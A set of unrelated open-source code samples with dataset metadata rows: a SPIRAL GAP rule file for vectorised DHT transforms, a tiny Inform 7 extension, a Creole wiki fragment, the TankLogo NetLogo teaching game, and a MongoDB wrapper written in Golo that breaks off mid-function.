d2 := VRCLR(Diag(fPrecompute(diagDirsum(fConst(TReal, 1, 1.0), diagMul(fConst(TComplex, N/2-1, omegapi(-1/2)), fCompose(dOmega(N, rot), fAdd(N/2, N/2-1, 1)))))), v),
#
#d1 *
VBlkInt(_VHStack([i, d2.transpose()], v) * VStack(mv1, mv2) * d1, v))
)
));
NewRulesFor(TXMatDHT, rec(
TXMatDHT_vec := rec(
switch := true,
applicable := (self, t) >> IsEvenInt(t.params[1]) and t.isTag(1, AVecReg),
apply := (self, t, C, Nonterms) >> let(N := t.params[1], v := t.getTag(1).v,
f0 := Replicate(v, 1.0),
f1 := [0.0] :: Replicate(v-1, 1.0),
f2 := [1.0] :: Replicate(v-1, -1.0),
fblk := VBlk([[f0,f1],[f1,f2]], v).setSymmetric(),
fdiag := VTensor(Tensor(I(N/(2*v)-1), F(2)), v),
ff := DirectSum(fblk, fdiag),
###
m := Mat([[1,0],[0,-1]]),
d1 := Diag(diagDirsum(fConst(TReal, 2, 1.0), fConst(TReal, N-2, 1/2))),
#m1 := DirectSum(m, SUM(I(N-2), Tensor(J((N-2)/2), m))),
#dv1 := Diag(diagDirsum(fConst(TReal, v,1), fConst(TReal, 1,-1), fConst(TReal, N-v-1, 1))),
dv1 := DirectSum(VTensor(I(1), v),
VBlk([[ [-1.0] :: Replicate(v-1, 1.0) ]], v),
VTensor(I(N/v-2), v)),
P1 := VPrm_x_I(L(N/v, N/(2*v)), v),
Q1 := VPrm_x_I(L(N/v, 2), v),
jv1 := P1*DirectSum(VO1dsJ(N/2, v), VScale(VO1dsJ(N/2, v), -1, v))*Q1,
mv1 := _VSUM([dv1,jv1], v),
#m2 := DirectSum(J(2), SUM(I(N-2), Tensor(J((N-2)/2), -m))),
e0 := [0.0] :: Replicate(v-1, 1.0),
e1 := [1.0] :: Replicate(v-1, 0.0),
blk := VBlk([[e0,e1],[e1,e0]], v).setSymmetric(),
dv2 := DirectSum(blk, VTensor(I(N/v-2), v)),
jv2 := P1*DirectSum(VScale(VO1dsJ(N/2, v), -1, v), VO1dsJ(N/2, v))*Q1,
mv2 := _VSUM([dv2,jv2], v),
#
i := VTensor(I(N/v), v),
d2 := VRCLR(Diag(fPrecompute(diagDirsum(fConst(TReal, 1, 1.0), diagMul(fConst(TComplex, N/2-1, Complex(0,-1)), fCompose(dOmega(N, 1), fAdd(N/2, N/2-1, 1)))))), v),
#
d1 * VBlkInt(ff * _VHStack([mv1, mv2], v) * VStack(i, d2), v)
))
));
| GAP | 4 | sr7cb/spiral-software | namespaces/spiral/paradigms/vector/breakdown/tconjeven.gi | [
"BSD-2-Clause-FreeBSD"
] |
Version 1 of Trivial Extension by Andrew Plotkin begins here.
A cow is a kind of animal. A cow can be purple.
Trivial Extension ends here.
| Inform 7 | 3 | waywardmonkeys/linguist | samples/Inform 7/Trivial Extension.i7x | [
"MIT"
] |
* [[/vacs/blogs/tagged.html?tag=Ada|Ada]]
* [[/vacs/blogs/tagged.html?tag=Tutorial|Tutorial]]
* [[/vacs/blogs/tagged.html?tag=files|files]]
Reading a file to get its content in a __String__ is a simple operation
| Creole | 1 | jquorning/ada-wiki | regtests/expect/wiki-import/list-3.creole | [
"Apache-2.0"
] |
;; ================================================================================================
;; =================================== Don't make changes here ====================================
;; ================================================================================================
breed [redTanks redTank]
breed [blueTanks blueTank]
breed [turrets turret]
breed [bullets bullet]
redTanks-own [
;;Users should not set the values of these variables in the code----------
name ;;Name of the tank
myTurret ;;Pointer to my turret
velocity ;;Velocity of the tank, non-negative
health ;;Health of the tank. The tank dies when health < 0.
startXcor ;;X coordinate when the tank is created
startYcor ;;Y coordinate when the tank is created
wins ;;Number of wins
;;Users can set the values of these variables in the code------------------
degree ;;Degree to rotate the tank
acceleration ;;Indicator of acceleration: -1 for decelerate, 1 for accelerate, 0 for none
]
blueTanks-own [
;;Users should not set the values of these variables in the code----------
name ;;Name of the tank
myTurret ;;Pointer to my turret
velocity ;;Velocity of the tank, non-negative
health ;;Health of the tank. The tank dies when health < 0.
startXcor ;;X coordinate when the tank is created
startYcor ;;Y coordinate when the tank is created
wins ;;Number of wins
;;Users can set the values of these variables in the code------------------
degree ;;Degree to rotate the tank
acceleration ;;Indicator of acceleration: -1 for decelerate, 1 for accelerate, 0 for none
;;Users can define their own variables here--------------------------------
]
turrets-own [
;;Users should not set the values of these variables in the code---------
heat ;;Heat of the turret
fp ;;Firepower
;;Users can set the values of these variables in the code-----------------
degree ;;Degree to rotate the turret
fire? ;;Control turret fire: true for fire, false for no fire
]
bullets-own [
;;Users should not set the values of these variables in the code---------
velocity
damage
]
globals [
;;Users should not set the values of these variables in the code---------
TankSize
StartHealth
CollisionHealth ;;Health damage from collisions with tanks or walls
MaxTurretRotation
VTankAcc ;;Acceleration of tank
VTankDec ;;Deceleration of tank
VTankMax ;;Max speed of tank
VFactor ;;For speed adjustment
FireHeat ;;Heat generated at each fire
TankRed
TankBlue
Tanks
]
to setup
ca
set VFactor 0.02
set FireHeat 20
set TankSize 3
set StartHealth 100
set CollisionHealth -5
set MaxTurretRotation 20 * VFactor
set VTankMax 1 * VFactor
set VTankAcc 0.2 * VFactor
set VTankDec -0.4 * VFactor
set Tanks nobody
ask patches with [pxcor = min-pxcor or pxcor = max-pxcor or pycor = min-pycor or pycor = max-pycor][
set pcolor yellow
]
reset-ticks
end
to obs-create-tank [argColor argPos]
let tr nobody
if Tanks != nobody and count Tanks with [color = argColor] > 0 [
ask Tanks with [color = argColor] [
ask myTurret [die]
die
]
]
create-turtles 1 [
if argColor = red [
set breed redTanks
set TankRed self
]
if argColor = blue [
set breed blueTanks
set TankBlue self
]
if argPos = 1 [setxy max-pxcor - tankSize max-pycor - tankSize]
if argPos = 5 [setxy min-pxcor + tankSize min-pycor + tankSize]
set shape "tank"
set name TankName
set color argColor
set size TankSize
set health StartHealth
hatch 1 [
set breed turrets
set shape "turret"
set fp FirePower
set tr self
]
set myTurret tr
create-link-to tr [
tie
set hidden? true
]
facexy 0 0
set startXcor xcor
set startYcor ycor
set Tanks (turtle-set Tanks self)
set-current-plot "Health"
create-temporary-plot-pen name
]
end
to obs-reset
ask bullets [die]
ask Tanks [
set xcor StartXcor
set ycor StartYcor
set health StartHealth
facexy 0 0
]
ask turrets [
set heat 0
]
obs-reset-plots
cd
reset-ticks
end
to obs-go
let tks Tanks with [health > 0]
ifelse LeaveTrack? [ask tks [pd]] [ask tks [pu]]
ask tks [
tank-prepare
]
ask tks [
ask myTurret [
turret-rotate
turret-fire
turret-cooldown
]
]
ask bullets [
bullet-forward
bullet-check-collision
]
ask tks [
tank-rotate
tank-change-velocity
tank-forward
tank-check-collision
]
obs-update-plots
if obs-check-win [stop]
tick
end
to-report obs-check-win
let tks Tanks with [health > 0]
if count tks = 1 [
ask one-of tks [set wins wins + 1]
user-message (word "Winner: " [name] of one-of tks)
report true
]
if count tks = 0 [
user-message "Tie"
report true
]
report false
end
to obs-update-plots
set-current-plot "Health"
ask Tanks [
set-current-plot-pen name
set-plot-pen-color color
plot health
]
end
to obs-reset-plots
set-current-plot "Health"
ask Tanks [
set-current-plot-pen name
plot-pen-reset
]
end
to tank-accelerate
set velocity min list VTankMax (velocity + VTankAcc)
end
to tank-decelerate
set velocity max list 0 (velocity + VTankDec)
end
to tank-change-velocity
if acceleration = -1 [tank-decelerate]
if acceleration = 1 [tank-accelerate]
end
to tank-forward
fd velocity
end
to tank-rotate
if degree = 0 [stop]
let dMax 10 - 5 * velocity / VTankMax
let th [heading] of myTurret
set heading heading + degree / (abs degree) * (max list dMax abs degree)
ask myTurret [set heading th]
end
to tank-check-collision
let tks other Tanks with [distance myself <= TankSize]
if count tks > 0 [
ask tks [
set health health + CollisionHealth
fd 0 - TankSize / 2
set velocity 0
]
set health health + CollisionHealth
fd 0 - TankSize / 2
set velocity 0
]
if pcolor = yellow [
set health health - velocity * 10
set velocity 0
move-to one-of neighbors with [pcolor != yellow]
]
end
to tank-prepare
if color = red [tank-prepare-red]
if color = blue [tank-prepare-blue]
end
to turret-rotate
if degree = 0 [stop]
set heading heading + degree / (abs degree) * (max list MaxTurretRotation abs degree)
end
to turret-fire
if not fire? or heat > 0 [stop]
let tfp fp
hatch 1 [
set breed bullets
set color white
set shape "circle"
set size 0.2 * tfp
fd tankSize / 2
set velocity (3 - 0.3 * tfp) * VFactor
set damage tfp * 4 * (3 - 0.3 * 5) * VFactor / velocity
]
set heat heat + fp * FireHeat
end
to turret-cooldown
set heat max list 0 (heat - 1)
end
to bullet-forward
fd velocity
end
to bullet-check-collision
let tks tanks with [distance myself < (TankSize / 2)]
if count tks > 0 [
ask tks [
set health health - [damage] of myself
]
die
]
if pcolor = yellow [die]
end
;; ================================================================================================
;; =================================== Don't make changes above ===================================
;; ================================================================================================
;; ================================================================================================
;; = The following code drives the 'best' red tank,
;; = all you need is to make your blue tank better than it!
;; =
;; = You can not make change related to the red tank here.
;; =================================================================================================
;; ======== status-1 【move forward status】=========
to status-forward[v]
if((item 0 v) != nobody)[
set velocity (item 0 v)
]
set degree 0
fd velocity
end
to status-random-forward[tickNum]
if ((item 0 tickNum) != nobody)[
if (ticks mod (item 0 tickNum) = 0)[set heading random-float 360]
]
end
;; ======== status-2 【move back status】=========
to status-back
set heading degree + 180
bk velocity
end
;; ======== status-3 【turn left status】=========
to status-left
set heading degree + 90
lt velocity
end
;; ======== status-4 【turn right status】=========
to status-right
set heading degree - 90
rt velocity
end
;; ======== status-5 【stop status】=========
to status-stop
set degree 0
set acceleration 0
set velocity 0
fd 0
end
;; ======== status-6 【find direction status】=========
;; find a safe direction before hitting on the wall or other tanks.
to status-stop-turn-wall
let tempDirection (random-float 360)
if((patch-at-heading-and-distance tempDirection 1) != nobody)[
ask patch-at-heading-and-distance tempDirection 1 [
if (pcolor != yellow)[
ask myself[
set heading tempDirection
fd velocity
]
]
]
]
end
to status-stop-turn-tank
let tks other Tanks with [distance myself > TankSize]
if(patch-at-heading-and-distance heading 2 != nobody)[
ask patch-at-heading-and-distance heading 2 [
if (pcolor = black)[
ask myself[
status-random-lrb
if item 0 [velocity] of tks != nobody [
fd (item 0 [velocity] of tks)
]
]
]
]
]
end
;; ======== status-7 【random turn left/right status】=========
to status-random-lrb
let direction random 180
if (direction > 0 and direction < 60)[status-left]
if (direction > 60 and direction < 120)[status-right]
if (direction > 120)[status-back]
end
;; ======== status-8 【dodge other's attack status】========
to status-dodge-forward[args]
let tks other Tanks with [distance myself > TankSize]
if count tks > 0[
ifelse ticks < 100 [
status-random-forward[101]
][
ifelse(ticks mod (item 0 args) = 0)[
let tempNum random 100
ifelse (tempNum mod 2 = 0)[
set heading ([heading] of (item 0 [myTurret] of tks) + 90)
][
set heading ([heading] of (item 0 [myTurret] of tks) - 90)
]
][status-forward[0.01]]
]
]
end
;; ======== 【set the moving status per tick】=========
;; this function will be called every ticks, we should set up the status machine here.
to tank-prepare-red
let tks other Tanks with [distance myself < TankSize + 3]
ifelse count tks > 0 [status-stop-turn-tank][status-forward[0.01]]
status-dodge-forward[500]
ask patches with [distance myself < 2 and pcolor = yellow][
ask myself[
status-stop-turn-wall
]
]
ask myTurret [
let enemys other Tanks with [distance myself > TankSize] ;with [distance myself < TankSize + 10];
if(count enemys > 0)[
if (item 0 ([patch-ahead 5] of enemys) != nobody)[
facexy ([pxcor] of item 0 ([patch-ahead 5] of enemys)) ([pycor] of item 0 ([patch-ahead 5] of enemys))
]
]
set fire? true
]
end
;; ================================================================================================
;; =================================== Don't make changes above ===================================
;; ================================================================================================
;; ===========================================================================================================================
;; =================================== The following procedures can be defined by the use ====================================
;; ===========================================================================================================================
;; You can build your tank here! and free to write new functions!
;; If you can beat the red tank (test over 100 times, if you win over 70% of the games, please send us a PR)
;; We will update the 'abest tank' as you designed, and your github avatar is and id will display in our github page.
;; ===========================================================================================================================
to tank-prepare-blue
let tks other Tanks with [distance myself < TankSize + 3]
ifelse count tks > 0 [status-stop-turn-tank][status-forward[0.01]]
status-random-forward[700]
ask patches with [distance myself < 2 and pcolor = yellow][
ask myself[
status-stop-turn-wall
]
]
ask myTurret [
let enemys other Tanks with [distance myself > TankSize] ;with [distance myself < TankSize + 10] ;等到敌人进入距离自己 10(假)再攻击他们
if(count enemys > 0)[
if (item 0 ([patch-ahead 5] of enemys) != nobody)[
facexy ([pxcor] of item 0 ([patch-ahead 5] of enemys)) ([pycor] of item 0 ([patch-ahead 5] of enemys))
]
]
set fire? true
]
end
@#$#@#$#@
GRAPHICS-WINDOW
310
24
747
462
-1
-1
13.0
1
10
1
1
1
0
0
0
1
-16
16
-16
16
1
1
1
ticks
30.0
BUTTON
763
271
864
304
NIL
setup
NIL
1
T
OBSERVER
NIL
NIL
NIL
NIL
1
INPUTBOX
1100
400
1273
461
TankName
blue tank
1
0
String
BUTTON
824
26
960
71
Create Red Tank
obs-create-tank red 1
NIL
1
T
OBSERVER
NIL
NIL
NIL
NIL
1
BUTTON
95
419
237
461
Create Blue Tank
obs-create-tank blue 5
NIL
1
T
OBSERVER
NIL
NIL
NIL
NIL
1
SLIDER
1099
314
1272
347
FirePower
FirePower
1
5
2.0
1
1
NIL
HORIZONTAL
BUTTON
985
269
1088
303
go
obs-go
T
1
T
OBSERVER
NIL
NIL
NIL
NIL
1
BUTTON
873
270
978
304
reset
obs-reset
NIL
1
T
OBSERVER
NIL
NIL
NIL
NIL
1
MONITOR
245
416
303
461
Win
[wins] of TankBlue
17
1
11
MONITOR
758
26
816
71
Win
[wins] of TankRed
17
1
11
PLOT
759
313
1091
463
Health
NIL
NIL
0.0
10.0
0.0
10.0
true
true
"" ""
PENS
SWITCH
1100
358
1271
391
LeaveTrack?
LeaveTrack?
0
1
-1000
@#$#@#$#@
## WHAT IS IT?
TankLogo aims for training the users' basic NetLogo programming techniques. It simulates a battle field with multiple tanks combating each other.
## HOW IT WORKS
The model pre-defines the basic behavior of the agents. The users have to define the specific behavior of their own tanks so that the tanks can think and behave automatically without human intervensions. The goal, of course, is to WIN!
## HOW TO USE IT
The users define the procedures like "tank-prepare-red, tank-prepare-blue" which prepare the parameters determining the tanks' behavior in each turn (tick).
## THINGS TO NOTICE
The users should not change the codes about the agents' basic behavior.
Collosions between the tanks or tanks and walls inflict damage.
## THINGS TO TRY
"FirePower" slide sets the fire power of a tank's gun. More fire power means a bullet can inflict more damage but with less velocity. Moreover, a more powful gun needs more time to cool down. When a gun is hot, it cannot fire.
## EXTENDING THE MODEL
(suggested things to add or change in the Code tab to make the model more complicated, detailed, accurate, etc.)
## NETLOGO FEATURES
(interesting or unusual features of NetLogo that the model uses, particularly in the Code tab; or where workarounds were needed for missing features)
## RELATED MODELS
TankLogo is inspired by Robocode (https://robocode.sourceforge.io/)
## CREDITS AND REFERENCES
TankLogo is developed by Wei Zhu, Department of Urban Planning, Tongji University, Shanghai, China
Version-20180925
@#$#@#$#@
default
true
0
Polygon -7500403 true true 150 5 40 250 150 205 260 250
airplane
true
0
Polygon -7500403 true true 150 0 135 15 120 60 120 105 15 165 15 195 120 180 135 240 105 270 120 285 150 270 180 285 210 270 165 240 180 180 285 195 285 165 180 105 180 60 165 15
arrow
true
0
Polygon -7500403 true true 150 0 0 150 105 150 105 293 195 293 195 150 300 150
box
false
0
Polygon -7500403 true true 150 285 285 225 285 75 150 135
Polygon -7500403 true true 150 135 15 75 150 15 285 75
Polygon -7500403 true true 15 75 15 225 150 285 150 135
Line -16777216 false 150 285 150 135
Line -16777216 false 150 135 15 75
Line -16777216 false 150 135 285 75
bug
true
0
Circle -7500403 true true 96 182 108
Circle -7500403 true true 110 127 80
Circle -7500403 true true 110 75 80
Line -7500403 true 150 100 80 30
Line -7500403 true 150 100 220 30
butterfly
true
0
Polygon -7500403 true true 150 165 209 199 225 225 225 255 195 270 165 255 150 240
Polygon -7500403 true true 150 165 89 198 75 225 75 255 105 270 135 255 150 240
Polygon -7500403 true true 139 148 100 105 55 90 25 90 10 105 10 135 25 180 40 195 85 194 139 163
Polygon -7500403 true true 162 150 200 105 245 90 275 90 290 105 290 135 275 180 260 195 215 195 162 165
Polygon -16777216 true false 150 255 135 225 120 150 135 120 150 105 165 120 180 150 165 225
Circle -16777216 true false 135 90 30
Line -16777216 false 150 105 195 60
Line -16777216 false 150 105 105 60
car
false
0
Polygon -7500403 true true 300 180 279 164 261 144 240 135 226 132 213 106 203 84 185 63 159 50 135 50 75 60 0 150 0 165 0 225 300 225 300 180
Circle -16777216 true false 180 180 90
Circle -16777216 true false 30 180 90
Polygon -16777216 true false 162 80 132 78 134 135 209 135 194 105 189 96 180 89
Circle -7500403 true true 47 195 58
Circle -7500403 true true 195 195 58
circle
false
0
Circle -7500403 true true 0 0 300
circle 2
false
0
Circle -7500403 true true 0 0 300
Circle -16777216 true false 30 30 240
cow
false
0
Polygon -7500403 true true 200 193 197 249 179 249 177 196 166 187 140 189 93 191 78 179 72 211 49 209 48 181 37 149 25 120 25 89 45 72 103 84 179 75 198 76 252 64 272 81 293 103 285 121 255 121 242 118 224 167
Polygon -7500403 true true 73 210 86 251 62 249 48 208
Polygon -7500403 true true 25 114 16 195 9 204 23 213 25 200 39 123
cylinder
false
0
Circle -7500403 true true 0 0 300
dot
false
0
Circle -7500403 true true 90 90 120
face happy
false
0
Circle -7500403 true true 8 8 285
Circle -16777216 true false 60 75 60
Circle -16777216 true false 180 75 60
Polygon -16777216 true false 150 255 90 239 62 213 47 191 67 179 90 203 109 218 150 225 192 218 210 203 227 181 251 194 236 217 212 240
face neutral
false
0
Circle -7500403 true true 8 7 285
Circle -16777216 true false 60 75 60
Circle -16777216 true false 180 75 60
Rectangle -16777216 true false 60 195 240 225
face sad
false
0
Circle -7500403 true true 8 8 285
Circle -16777216 true false 60 75 60
Circle -16777216 true false 180 75 60
Polygon -16777216 true false 150 168 90 184 62 210 47 232 67 244 90 220 109 205 150 198 192 205 210 220 227 242 251 229 236 206 212 183
fish
false
0
Polygon -1 true false 44 131 21 87 15 86 0 120 15 150 0 180 13 214 20 212 45 166
Polygon -1 true false 135 195 119 235 95 218 76 210 46 204 60 165
Polygon -1 true false 75 45 83 77 71 103 86 114 166 78 135 60
Polygon -7500403 true true 30 136 151 77 226 81 280 119 292 146 292 160 287 170 270 195 195 210 151 212 30 166
Circle -16777216 true false 215 106 30
flag
false
0
Rectangle -7500403 true true 60 15 75 300
Polygon -7500403 true true 90 150 270 90 90 30
Line -7500403 true 75 135 90 135
Line -7500403 true 75 45 90 45
flower
false
0
Polygon -10899396 true false 135 120 165 165 180 210 180 240 150 300 165 300 195 240 195 195 165 135
Circle -7500403 true true 85 132 38
Circle -7500403 true true 130 147 38
Circle -7500403 true true 192 85 38
Circle -7500403 true true 85 40 38
Circle -7500403 true true 177 40 38
Circle -7500403 true true 177 132 38
Circle -7500403 true true 70 85 38
Circle -7500403 true true 130 25 38
Circle -7500403 true true 96 51 108
Circle -16777216 true false 113 68 74
Polygon -10899396 true false 189 233 219 188 249 173 279 188 234 218
Polygon -10899396 true false 180 255 150 210 105 210 75 240 135 240
house
false
0
Rectangle -7500403 true true 45 120 255 285
Rectangle -16777216 true false 120 210 180 285
Polygon -7500403 true true 15 120 150 15 285 120
Line -16777216 false 30 120 270 120
leaf
false
0
Polygon -7500403 true true 150 210 135 195 120 210 60 210 30 195 60 180 60 165 15 135 30 120 15 105 40 104 45 90 60 90 90 105 105 120 120 120 105 60 120 60 135 30 150 15 165 30 180 60 195 60 180 120 195 120 210 105 240 90 255 90 263 104 285 105 270 120 285 135 240 165 240 180 270 195 240 210 180 210 165 195
Polygon -7500403 true true 135 195 135 240 120 255 105 255 105 285 135 285 165 240 165 195
line
true
0
Line -7500403 true 150 0 150 300
line half
true
0
Line -7500403 true 150 0 150 150
pentagon
false
0
Polygon -7500403 true true 150 15 15 120 60 285 240 285 285 120
person
false
0
Circle -7500403 true true 110 5 80
Polygon -7500403 true true 105 90 120 195 90 285 105 300 135 300 150 225 165 300 195 300 210 285 180 195 195 90
Rectangle -7500403 true true 127 79 172 94
Polygon -7500403 true true 195 90 240 150 225 180 165 105
Polygon -7500403 true true 105 90 60 150 75 180 135 105
plant
false
0
Rectangle -7500403 true true 135 90 165 300
Polygon -7500403 true true 135 255 90 210 45 195 75 255 135 285
Polygon -7500403 true true 165 255 210 210 255 195 225 255 165 285
Polygon -7500403 true true 135 180 90 135 45 120 75 180 135 210
Polygon -7500403 true true 165 180 165 210 225 180 255 120 210 135
Polygon -7500403 true true 135 105 90 60 45 45 75 105 135 135
Polygon -7500403 true true 165 105 165 135 225 105 255 45 210 60
Polygon -7500403 true true 135 90 120 45 150 15 180 45 165 90
sheep
false
15
Circle -1 true true 203 65 88
Circle -1 true true 70 65 162
Circle -1 true true 150 105 120
Polygon -7500403 true false 218 120 240 165 255 165 278 120
Circle -7500403 true false 214 72 67
Rectangle -1 true true 164 223 179 298
Polygon -1 true true 45 285 30 285 30 240 15 195 45 210
Circle -1 true true 3 83 150
Rectangle -1 true true 65 221 80 296
Polygon -1 true true 195 285 210 285 210 240 240 210 195 210
Polygon -7500403 true false 276 85 285 105 302 99 294 83
Polygon -7500403 true false 219 85 210 105 193 99 201 83
square
false
0
Rectangle -7500403 true true 30 30 270 270
square 2
false
0
Rectangle -7500403 true true 30 30 270 270
Rectangle -16777216 true false 60 60 240 240
star
false
0
Polygon -7500403 true true 151 1 185 108 298 108 207 175 242 282 151 216 59 282 94 175 3 108 116 108
tank
true
0
Rectangle -7500403 true true 45 90 255 255
Polygon -7500403 true true 150 30 45 75 255 75
target
false
0
Circle -7500403 true true 0 0 300
Circle -16777216 true false 30 30 240
Circle -7500403 true true 60 60 180
Circle -16777216 true false 90 90 120
Circle -7500403 true true 120 120 60
tree
false
0
Circle -7500403 true true 118 3 94
Rectangle -6459832 true false 120 195 180 300
Circle -7500403 true true 65 21 108
Circle -7500403 true true 116 41 127
Circle -7500403 true true 45 90 120
Circle -7500403 true true 104 74 152
triangle
false
0
Polygon -7500403 true true 150 30 15 255 285 255
triangle 2
false
0
Polygon -7500403 true true 150 30 15 255 285 255
Polygon -16777216 true false 151 99 225 223 75 224
truck
false
0
Rectangle -7500403 true true 4 45 195 187
Polygon -7500403 true true 296 193 296 150 259 134 244 104 208 104 207 194
Rectangle -1 true false 195 60 195 105
Polygon -16777216 true false 238 112 252 141 219 141 218 112
Circle -16777216 true false 234 174 42
Rectangle -7500403 true true 181 185 214 194
Circle -16777216 true false 144 174 42
Circle -16777216 true false 24 174 42
Circle -7500403 false true 24 174 42
Circle -7500403 false true 144 174 42
Circle -7500403 false true 234 174 42
turret
true
0
Rectangle -16777216 true false 120 45 180 120
Circle -16777216 true false 96 96 108
Circle -1 true false 108 108 85
Rectangle -1 true false 135 60 165 120
turtle
true
0
Polygon -10899396 true false 215 204 240 233 246 254 228 266 215 252 193 210
Polygon -10899396 true false 195 90 225 75 245 75 260 89 269 108 261 124 240 105 225 105 210 105
Polygon -10899396 true false 105 90 75 75 55 75 40 89 31 108 39 124 60 105 75 105 90 105
Polygon -10899396 true false 132 85 134 64 107 51 108 17 150 2 192 18 192 52 169 65 172 87
Polygon -10899396 true false 85 204 60 233 54 254 72 266 85 252 107 210
Polygon -7500403 true true 119 75 179 75 209 101 224 135 220 225 175 261 128 261 81 224 74 135 88 99
wheel
false
0
Circle -7500403 true true 3 3 294
Circle -16777216 true false 30 30 240
Line -7500403 true 150 285 150 15
Line -7500403 true 15 150 285 150
Circle -7500403 true true 120 120 60
Line -7500403 true 216 40 79 269
Line -7500403 true 40 84 269 221
Line -7500403 true 40 216 269 79
Line -7500403 true 84 40 221 269
wolf
false
0
Polygon -16777216 true false 253 133 245 131 245 133
Polygon -7500403 true true 2 194 13 197 30 191 38 193 38 205 20 226 20 257 27 265 38 266 40 260 31 253 31 230 60 206 68 198 75 209 66 228 65 243 82 261 84 268 100 267 103 261 77 239 79 231 100 207 98 196 119 201 143 202 160 195 166 210 172 213 173 238 167 251 160 248 154 265 169 264 178 247 186 240 198 260 200 271 217 271 219 262 207 258 195 230 192 198 210 184 227 164 242 144 259 145 284 151 277 141 293 140 299 134 297 127 273 119 270 105
Polygon -7500403 true true -1 195 14 180 36 166 40 153 53 140 82 131 134 133 159 126 188 115 227 108 236 102 238 98 268 86 269 92 281 87 269 103 269 113
x
false
0
Polygon -7500403 true true 270 75 225 30 30 225 75 270
Polygon -7500403 true true 30 75 75 30 270 225 225 270
@#$#@#$#@
NetLogo 6.0.4
@#$#@#$#@
@#$#@#$#@
@#$#@#$#@
@#$#@#$#@
@#$#@#$#@
default
0.0
-0.2 0 0.0 1.0
0.0 1 1.0 0.0
0.2 0 0.0 1.0
link direction
true
0
Line -7500403 true 150 150 90 180
Line -7500403 true 150 150 210 180
@#$#@#$#@
0
@#$#@#$#@
| NetLogo | 5 | ajnavarro/language-dataset | data/github.com/huangyz0918/TankLogo/44704c398f6a5c1f1bc28d440ceb9690be4e34cb/TankLogo.nlogo | [
"MIT"
] |
module mongoo
import com.mongodb.MongoClient
import com.mongodb.MongoException
import com.mongodb.WriteConcern
import com.mongodb.DB
import com.mongodb.DBCollection
import com.mongodb.BasicDBObject
import com.mongodb.DBObject
import com.mongodb.DBCursor
import com.mongodb.ServerAddress
import org.bson.types.ObjectId
----
let mongocli = mongo("database", "localhost", 27017): initialize()
let humanModel = mongocli: modelOf("humans")
http://api.mongodb.org/java/2.12/com/mongodb/QueryBuilder.html
http://api.mongodb.org/java/2.11.4/com/mongodb/DBCursor.html
http://api.mongodb.org/java/2.11.4/com/mongodb/QueryBuilder.html
http://stackoverflow.com/questions/14314692/simple-query-in-mongodb-in-java
----
struct mongo = {
_mongoClient,
_db
}
augment mongo {
function initialize = |self, databaseName, host, port| {
#TODO: verify connection
self: _mongoClient(MongoClient(host, port))
self: _db(self: _mongoClient(): getDB(databaseName))
return self
}
function db = |self| -> self: _db()
# returns a com.mongodb.DBCollection
function collection = |self, collectionName| {
let dbCollection = self: _db(): getCollection(collectionName)
#let newModel = mongoModel(dbCollection, BasicDBObject())
let newCollection = mongoCollection(
dbCollection,
null, null, null
)
return newCollection
}
function model = |self, collectionName| {
let dbCollection = self: _db(): getCollection(collectionName)
let newModel = mongoModel(dbCollection, BasicDBObject())
return newModel
}
}
struct mongoCollection = {
_collection,
skip,
limit,
sort
}
augment mongoCollection {
function options = |self, cursor| {
if self: sort() isnt null {
cursor: sort(BasicDBObject(self: sort(): get(0), self: sort(): get(1)))
self: sort(null)
}
if self: skip() isnt null {
cursor: skip(self: skip()): limit(self: limit())
self: skip(null): limit(null)
}
return cursor
}
# helpers :
function cursorToListOfMaps = |self, cursor| { # return list of HashMaps
let models = list[]
cursor: each(|doc| {
let map = doc: toMap()
let id = doc: getObjectId("_id"): toString()
map: put("_id", id)
models: add(map)
})
return models
}
# helpers :
function cursorToList = |self, cursor| { # return list of MongoModels
let models = list[]
cursor: each(|doc| {
let newModel = mongoModel(self: _collection(), BasicDBObject())
newModel: fromMap(doc: toMap())
models: add(newModel)
})
return models
}
function fetch = |self| {
let cursor = self: _collection(): find() # lazy fetch
self: options(cursor)
return self: cursorToList(cursor)
}
function fetchMaps = |self| {
let cursor = self: _collection(): find() # lazy fetch
self: options(cursor)
return self: cursorToListOfMaps(cursor)
}
# find models (value objects)
#coll: find("firstName", "John")
function find = |self, fieldName, value| {
let query = BasicDBObject(fieldName, value)
let cursor = self: _collection(): find(query)
self: options(cursor)
return self: cursorToList(cursor)
}
function findMaps = |self, fieldName, value| {
let query = BasicDBObject(fieldName, value)
let cursor = self: _collection(): find(query)
self: options(cursor)
return self: cursorToListOfMaps(cursor)
}
#coll: like("firstName", ".*o.*")
function like = |self, fieldName, value| {
let query = BasicDBObject(fieldName, java.util.regex.Pattern.compile(value))
let cursor = self: _collection(): find(query)
self: options(cursor)
return self: cursorToList(cursor)
}
function likeMaps = |self, fieldName, value| {
let query = BasicDBObject(fieldName, java.util.regex.Pattern.compile(value))
let cursor = self: _collection(): find(query)
self: options(cursor)
return self: cursorToListOfMaps(cursor)
}
function query = |self, query| {
# query is a com.mongodb.QueryBuilder
let cursor = self: _collection(): find(query)
self: options(cursor)
return self: cursorToList(cursor)
}
function queryMaps = |self, query| {
# query is a com.mongodb.QueryBuilder
let cursor = self: _collection(): find(query)
self: options(cursor)
return self: cursorToListOfMaps(cursor)
}
# let query = QueryBuilder.start("pseudo"): notEquals("@sam"): get()
# buddies: query(query)
}
struct mongoModel = {
_collection,
_basicDBObject
}
augment mongoModel {
function id = |self| -> self: _basicDBObject(): getObjectId("_id"): toString()
function field = |self, fieldName, fieldValue| {
self: _basicDBObject(): put(fieldName, fieldValue)
return self
}
function field = |self, fieldName| -> self: _basicDBObject(): get(fieldName)
function fields = |self, fieldsMap| {
#TODO
}
function insert = |self| {
self: _collection(): insert(self: _basicDBObject())
return self
}
function update = |self| {
let id = self: _basicDBObject(): get("_id")
self: _basicDBObject(): removeField("_id")
let searchQuery = BasicDBObject(): append("_id", ObjectId(id))
self: _collection(): update(searchQuery, self: _basicDBObject())
self: _basicDBObject(): put("_id", ObjectId(id))
return self
}
function fetch = |self, id| {
let searchQuery = BasicDBObject(): append("_id", ObjectId(id))
#self: _basicDBObject(): putAll(self: _collection(): findOne(searchQuery))
self: _collection(): find(searchQuery): each(|doc| {
self: _basicDBObject(): putAll(doc)
})
return self
}
function fetch = |self| {
return self: fetch(self: id())
}
function remove = |self, id| {
let searchQuery = BasicDBObject(): append("_id", ObjectId(id))
let doc = self: _collection(): find(searchQuery): next()
self: _basicDBObject(): putAll(doc)
self: _collection(): remove(doc)
return self
}
function remove = |self| {
return self: remove(self: id())
}
function toMap = |self| {
let map = self: _basicDBObject(): toMap()
map: put("_id", self: id())
return map
}
function fromMap = |self, fieldsMap| {
